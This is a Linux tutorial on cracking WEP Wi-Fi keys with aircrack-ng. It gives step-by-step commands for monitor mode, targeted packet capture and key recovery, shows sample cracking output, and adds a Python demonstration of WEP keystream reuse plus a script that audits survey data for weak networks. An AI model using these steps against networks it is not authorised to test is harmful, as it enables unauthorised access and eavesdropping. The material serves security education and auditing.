How to crack a wireless WEP key using aircrack-ng

This article briefly describes the steps to crack a wireless WEP key using the aircrack-ng software. This is done by sniffing a wireless network, capturing encrypted packets, and running an appropriate cracking program in an attempt to decrypt the captured data. WEP (Wired Equivalent Privacy) is quite easy to crack, as it uses only one key to encrypt all traffic.

The basic principle is that communication between two nodes on a network is based on the MAC address. Each host accepts only packets addressed to the MAC address of its own interface. The same principle applies to wireless networks. However, if a node puts its network card into promiscuous mode, it will also receive packets that are not addressed to its own MAC address.

To crack the WEP key, a hacker needs to capture sample packets not intended for his own network interface and run a cracking program that tests candidate keys against the WEP-encrypted captured packets in an attempt to decrypt them. The key that successfully decrypts the captured packets is the key the wireless network uses to encrypt all communication with its connected stations.
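To make concrete why one static key for all traffic is a weakness, the following added example (not part of the original article) builds WEP frame bodies and shows that two frames sent under the same 24-bit IV leak the XOR of their plaintexts without the key being known. The IV and payloads are constructed; the 40-bit key is the one shown in this article's sample aircrack-ng output, and the probability estimate assumes IVs are chosen uniformly at random.

```python
import math
import zlib

def rc4_keystream(key: bytes, n: int) -> bytes:
    """Plain RC4: key scheduling, then n bytes of output keystream."""
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def wep_encrypt(key: bytes, iv: bytes, payload: bytes) -> bytes:
    """WEP frame body: cleartext 3-byte IV + key-id byte, then RC4(IV || key)
    applied to payload + ICV (CRC-32, little-endian)."""
    data = payload + zlib.crc32(payload).to_bytes(4, "little")
    return iv + b"\x00" + xor(data, rc4_keystream(iv + key, len(data)))

def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    iv, body = frame[:3], frame[4:]
    data = xor(body, rc4_keystream(iv + key, len(body)))
    if zlib.crc32(data[:-4]).to_bytes(4, "little") != data[-4:]:
        raise ValueError("ICV mismatch")
    return data[:-4]

def iv_repeat_probability(frames: int) -> float:
    """Birthday estimate that two of `frames` frames share a 24-bit IV
    (assumes IVs are chosen uniformly at random)."""
    return 1 - math.exp(-frames * (frames - 1) / (2 * 2**24))

# Constructed demo values; the key is the one in the article's sample output.
KEY = bytes.fromhex("3FF38E6E98")
IV = bytes.fromhex("a1b2c3")
P1, P2 = b"GET /index.html ", b"user=alice&pin=1"
F1, F2 = wep_encrypt(KEY, IV, P1), wep_encrypt(KEY, IV, P2)

def same_iv_leak() -> bool:
    """With a repeated IV the keystream cancels: C1 xor C2 == P1 xor P2."""
    return xor(F1[4:], F2[4:])[:len(P1)] == xor(P1, P2)
```

Because the shared key never changes and the IV space is only 2^24, repeats become likely after a few thousand frames, which is why WEP should be replaced rather than re-keyed.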

In the following sections, we’ll guide you through aircrack-ng installation on Linux, then show you step-by-step instructions to crack a wireless WEP key. The guide assumes that you have a wireless network card installed and that it supports monitor mode.

In this tutorial you will learn:

  • How to install aircrack-ng on major Linux distros
  • How to crack a wireless WEP key using aircrack-ng

Software Requirements and Linux Command Line Conventions

Category      Requirements, Conventions or Software Version Used
System        Any Linux distro
Software      aircrack-ng
Other         Privileged access to your Linux system as root or via the sudo command.
Conventions   # – requires given linux commands to be executed with root privileges either directly as a root user or by use of sudo command
              $ – requires given linux commands to be executed as a regular non-privileged user

Install aircrack-ng on major Linux distros

To get started, you will need the aircrack-ng software installed on your system. You can use the appropriate command below to install the program with your system’s package manager.

To install aircrack-ng on Ubuntu, Debian, and Linux Mint:

$ sudo apt install aircrack-ng

To install aircrack-ng on CentOS, Fedora, AlmaLinux, and Red Hat:

$ sudo dnf install aircrack-ng

To install aircrack-ng on Arch Linux and Manjaro:

$ sudo pacman -S aircrack-ng

Crack wireless WEP key

  1. First, we need to identify the name of our wireless network interface. If your wireless network card is installed correctly, the iwconfig command will reveal the name of your wireless network interface:
    $ iwconfig
    wlan0     IEEE 802.11  Mode:Monitor  Frequency:2.437 GHz  Tx-Power=20 dBm

    The output shows that in our case, the interface name is wlan0.

  2. Next, turn on monitor mode for the wireless interface.
    # airmon-ng start wlan0
    Interface       Chipset         Driver
    wlan0                   rtl8180 - [phy0]
          (monitor mode enabled on mon0)

    The result of the command will give you the name of the new virtual interface. It tends to be mon0.

  3. Dump the results of the monitor into a terminal, so you can see them.
    # airodump-ng mon0

    You can see a table of data pertaining to wireless networks in your area. You only need information about the network you wish to crack. Look for it, and note the BSSID and the channel that it’s on.

  4. Next, you’re going to log the results of a scan to a file. That capture log will be needed by Aircrack to run a brute force attack on the network later. To get your capture, you’re going to run the same command as before, but you’ll specify your BSSID, channel, and the log location.
    # airodump-ng -c 1 --bssid XX:XX:XX:XX:XX:XX -w Documents/logs/wep-crack mon0

    Fill in your actual information before running the command, and leave it running.

  5. As the last step, we crack the WEP key using the captured packets and the aircrack-ng command. All captured packets are now stored in the wep-crack-01.cap file.
    # aircrack-ng -z wep-crack-01.cap

    Your output should look something like this:

    Opening wep-crack-01.cap
    Read 450 packets.
       #  BSSID              ESSID                     Encryption
       1  00:11:95:9F:FD:F4           WEP (210 IVs)
       2  00:17:3F:65:2E:5A  belkin54g                 None (
    Index number of target network ?
                                   Aircrack-ng 1.0 rc1
                   [00:00:13] Tested 485 keys (got 16690 IVs)
       KB    depth   byte(vote)
        0    9/ 13   00(20992) 06(20736) 27(20736) 3F(20736) A2(20736)
        1    0/  1   F3(28416) A8(23296) 34(21248) 57(21248) A3(21248)
        2    0/  2   8E(25856) BC(23808) 3F(23040) D2(22784) 69(21504)
        3    0/  5   6E(24320) 35(22528) 5A(22016) 95(22016) B8(22016)
        4    3/  4   98(21504) 7C(20992) 84(20992) E0(20992) F0(20992)
                             KEY FOUND! [ 3F:F3:8E:6E:98 ]
            Decrypted correctly: 100%
aircrack-ng attempting to crack the WEP key on Linux

Closing Thoughts

In this guide, we saw how to install aircrack-ng on Linux and use the software to crack a wireless WEP key. Remember this process should only ever be used to test your own security or for educational purposes. Using it on someone else’s network is illegal.
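For testing your own security, the following added example (not part of the original article) audits a survey of your own site for networks that still advertise WEP or no encryption, so they can be reconfigured. It assumes the CSV file that airodump-ng -w writes next to the .cap capture (an access point section with a header row starting with BSSID, followed by a "Station MAC" section); the sample rows are constructed, reusing the two BSSIDs from the output above.

```python
import csv
import io

# Constructed sample in the assumed airodump-ng CSV layout.
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:95:9F:FD:F4, 2024-05-01 10:00:00, 2024-05-01 10:05:00,  1,  54, WEP , WEP,   , -40, 120, 16690, 0.  0.  0.  0,  0, ,
00:17:3F:65:2E:5A, 2024-05-01 10:00:01, 2024-05-01 10:05:00,  6,  54, OPN ,    ,   , -55,  80,     0, 0.  0.  0.  0,  9, belkin54g,
02:00:00:00:00:01, 2024-05-01 10:00:02, 2024-05-01 10:05:00, 11, 130, WPA2, CCMP, PSK, -60, 95,    0, 0.  0.  0.  0, 11, office,main,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
02:00:00:00:00:aa, 2024-05-01 10:01:00, 2024-05-01 10:04:00, -50, 42, 00:11:95:9F:FD:F4,
"""

ADVICE = {"WEP": "replace with WPA2/WPA3", "OPN": "no encryption; enable WPA2/WPA3"}

def parse_aps(csv_text):
    """Return one dict per access point from the AP section of the CSV."""
    aps, header, essid_col = [], None, 0
    for row in csv.reader(io.StringIO(csv_text)):
        cells = [c.strip() for c in row]
        if not cells or not cells[0]:
            continue                      # blank separator lines
        if cells[0] == "BSSID":
            header = cells
            essid_col = header.index("ESSID")
        elif cells[0] == "Station MAC":
            break                         # client section follows; not needed here
        elif header and len(cells) >= len(header):
            ap = dict(zip(header, cells))
            # An ESSID may itself contain commas: rejoin up to the Key column.
            ap["ESSID"] = ",".join(row[essid_col:-1]).strip()
            aps.append(ap)
    return aps

def weak_networks(csv_text):
    """List access points whose Privacy column shows WEP or OPN (open)."""
    findings = []
    for ap in parse_aps(csv_text):
        weak = [m for m in ap["Privacy"].split() if m in ADVICE]
        if weak:
            findings.append({"bssid": ap["BSSID"], "essid": ap["ESSID"] or "<hidden>",
                             "channel": ap["channel"], "privacy": weak[0],
                             "action": ADVICE[weak[0]]})
    return findings

if __name__ == "__main__":
    for f in weak_networks(SAMPLE_CSV):
        print(f"{f['bssid']}  ch {f['channel']:>2}  {f['privacy']}  {f['essid']}: {f['action']}")
```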
